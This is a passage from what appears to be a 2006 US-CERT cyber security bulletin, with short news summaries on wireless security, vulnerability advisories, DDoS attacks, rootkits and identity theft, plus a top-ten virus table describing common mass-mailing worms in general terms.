  • Security Worries Hang Up Mobile Plans: Based on concerns over IT security, research indicates that many companies are putting a hold on the introduction of new wireless technologies. According to a survey published by Symantec and the research arm of UK-based newspaper The Economist, the threat of virus attacks, potential flaws in smart phone software and a lack of wireless network access controls have forced many enterprise firms to slow down their adoption of additional mobile applications and devices.
  • Municipal Wi-Fi Could Cause Headaches: According to the chief technology officer for AirDefense, the largest concern is the ability to compromise the security of the corporate local area network (LAN) regardless of how it is set up. "Even if you have a policy of no Wi-Fi [usage], suddenly Wi-Fi is available on the lamp pole outside."
  • 802.11w fills wireless security holes: New cryptographic algorithms have been introduced by IEEE 802.11i, the standard behind Wi-Fi Protected Access and WPA 2, that patch the holes in the original Wired Equivalent Privacy specification. Now, the 802.11w task group is looking at extending the protection beyond data to management frames, which perform the core operations of a network.
  • Spy program snoops on cell phones: New software that hides on cell phones and captures call logs and text messages is being sold as a way to monitor kids and spouses. But according to one security company, it is a Trojan horse. The FlexiSpy application captures call logs, text messages and mobile Internet activity, among other things.


General Trends
This section contains brief summaries and links to articles which discuss or present information pertinent to the cyber security community.
  • Multiple Buffer Overflow Vulnerabilities in RealNetworks, Inc.'s Products: US-CERT is aware of multiple vulnerabilities in RealNetworks, Inc.'s products. Each of these vulnerabilities may result in a buffer overflow within RealPlayer that could allow a remote attacker to execute arbitrary code.
  • US Takes Interest in DDoS Attacks: Senior levels of the US government are taking an interest in recent distributed Denial of Service (DDoS) attacks against the internet's domain name system. In recent months, there have been large-scale and ongoing attacks against several DNS infrastructure providers, using a newly discovered method that enables the bad guys to greatly amplify the amount of attack traffic they can throw at their targets.
  • Active Exploitation of Cross-site Scripting Vulnerability in eBay.com: US-CERT is aware of an active exploitation of a cross-site scripting vulnerability in the eBay website. Successful exploitation may either allow an attacker to obtain sensitive data from stored cookies or redirect auction viewers to phishing sites where further disclosure of login credentials or personal information can occur. US-CERT VU#808921
  • Hackers Serve Rootkits with Bagles: According to F-Secure, the latest Bagle.GE variant loads a kernel-mode driver to hide the processes and registry keys of itself and other Bagle-related malware from security scanners. The use of offensive rootkits in existing virus threats signals an aggressive push by attackers to get around existing anti-virus software and maintain a persistent and undetectable presence on infected machines.
  • Survey: Identity theft hits 3 percent: According to a study based on the National Crime Victimization Survey (NCVS), an estimated 3.1 percent of American households became victims of identity theft in 2004. The study, which surveyed 42,000 households, found the most likely families to suffer identity theft included those with a young head of household (18 to 24 years of age) and those in the highest income bracket (greater than $75,000 per year). Identity theft was identified as the unauthorized use or attempted use of existing credit cards, accounts such as checking or brokerage accounts, or the misuse of information to obtain new credit accounts or to commit crimes.
  • 0603-exploits.tgz: Packet Storm new exploits for March, 2006.
  • Vendors failing to secure applications: According to Alan Paller, director of research for SANS, weak digital security in businesses helps hackers to fund criminal activity. Software application vendors are still failing to sell secure products, and it is a problem that is leaving customers open to hacking attacks.


Viruses/Trojans

Top Ten Virus Threats

A list of high threat viruses, as reported to various anti-virus vendors and virus incident reporting organizations, has been ranked and categorized in the table below. For the purposes of collecting and collating data, infections involving multiple systems at a single location are considered a single infection. It is therefore possible that a virus has infected hundreds of machines but has only been counted once. With the number of viruses that appear each month, it is possible that a new virus will become widely distributed before the next edition of this publication. To limit the possibility of infection, readers are reminded to update their anti-virus packages as soon as updates become available. The table lists the viruses by ranking (number of sites affected), common virus name, type of virus code (i.e., boot, file, macro, multi-partite, script), trends (based on number of infections reported since last week), and approximate date first found.

Rank | Common Name | Type of Code | Trend | Date First Found | Description
1 | Netsky-P | Win32 Worm | Stable | March 2004 | A mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning the hard drives and mapped drives. The worm also tries to spread through various file-sharing programs by copying itself into shared folders.
2 | Zafi-B | Win32 Worm | Stable | June 2004 | A mass-mailing worm that spreads via e-mail using several different languages, including English, Hungarian and Russian. When executed, the worm makes two copies of itself in the %System% directory with randomly generated file names.
3 | Lovgate.w | Win32 Worm | Stable | April 2004 | A mass-mailing worm that propagates by using MAPI to reply to messages, by using an internal SMTP engine, by dropping copies of itself on network shares, and through peer-to-peer networks. It attempts to access all machines on the local area network.
4 | Mytob.C | Win32 Worm | Increase | March 2004 | A mass-mailing worm with IRC backdoor functionality which can also infect computers vulnerable to the Windows LSASS (MS04-011) exploit. The worm attempts to harvest email addresses from the local hard disk by scanning files.
5 | Mytob-GH | Win32 Worm | Slight Decrease | November 2005 | A variant of the mass-mailing worm that disables security-related programs and allows others to access the infected system. This version sends itself to email addresses harvested from the system, forging the sender's address.
6 | Nyxum-D | Win32 Worm | New | March 2006 | A mass-mailing worm that turns off anti-virus software, deletes files, downloads code from the Internet, and installs itself in the registry. This version also harvests email addresses from the infected machine and uses its own emailing engine to forge the sender's address.
7 | Netsky-D | Win32 Worm | Decrease | March 2004 | A simplified variant of the Netsky mass-mailing worm: it does not contain many of the text strings that were present in Netsky.C and it does not copy itself to shared folders. Netsky.D spreads only as an executable e-mail attachment.
8 | Mytob-BE | Win32 Worm | Increase | June 2005 | A slight variant of the mass-mailing worm that uses an IRC backdoor, the LSASS vulnerability, and email to propagate. It harvests addresses from the Windows address book, disables antivirus software, and modifies data.
9 | Mytob-AS | Win32 Worm | Decrease | June 2005 | A slight variant of the mass-mailing worm that disables security-related programs and processes, redirects various sites, and changes registry values. This version downloads code from the net and uses its own email engine.
10 | Zafi-D | Win32 Worm | Slight Decrease | December 2004 | A mass-mailing worm that sends itself to email addresses gathered from the infected computer. The worm may also attempt to lower security settings, terminate processes, and open a back door on the compromised computer.

Table updated April 3, 2006
